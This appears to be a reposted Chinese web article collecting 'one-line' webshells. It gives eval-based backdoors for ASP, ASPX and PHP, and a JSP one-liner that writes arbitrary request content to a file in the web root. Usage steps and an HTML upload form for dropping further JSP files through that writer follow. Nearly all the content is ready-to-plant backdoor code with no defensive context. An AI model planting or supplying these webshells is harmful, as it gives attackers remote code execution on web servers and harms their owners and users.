asp一句话:<%eval request("1.2.3")%>
aspx一句话:<%@ Page Language="Jscript"%><%eval(Request.Item["1.2.3"])%>
php一句话:<?php eval($_POST[1.2.3])?>
jsp一句话:<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
分析如下:
保存为1.jsp
访问:http://localhost/1.jsp?f=1.txt&t=1.2.3
访问:http://localhost/1.txt
输出:1.2.3
客户端
<form action="http://localhost/1.jsp?f=1.2.3.jsp" method="post">
<textarea name="t" cols="50" rows="50"></textarea><br>
<input type="submit" value="submit">
</form>
一句话安全
转载本文章为转载内容,我们尊重原作者对文章享有的著作权。如有内容错误或侵权问题,欢迎原作者联系我们进行内容更正或删除文章。

提问和评论都可以,用心的回复会被更多人看到
评论
发布评论
相关文章
-
一句话技巧
系统、硬件、网络等等一句话可以解决的问题
职场 技巧 休闲 -
一句话命令
一句话命令
命令 一句话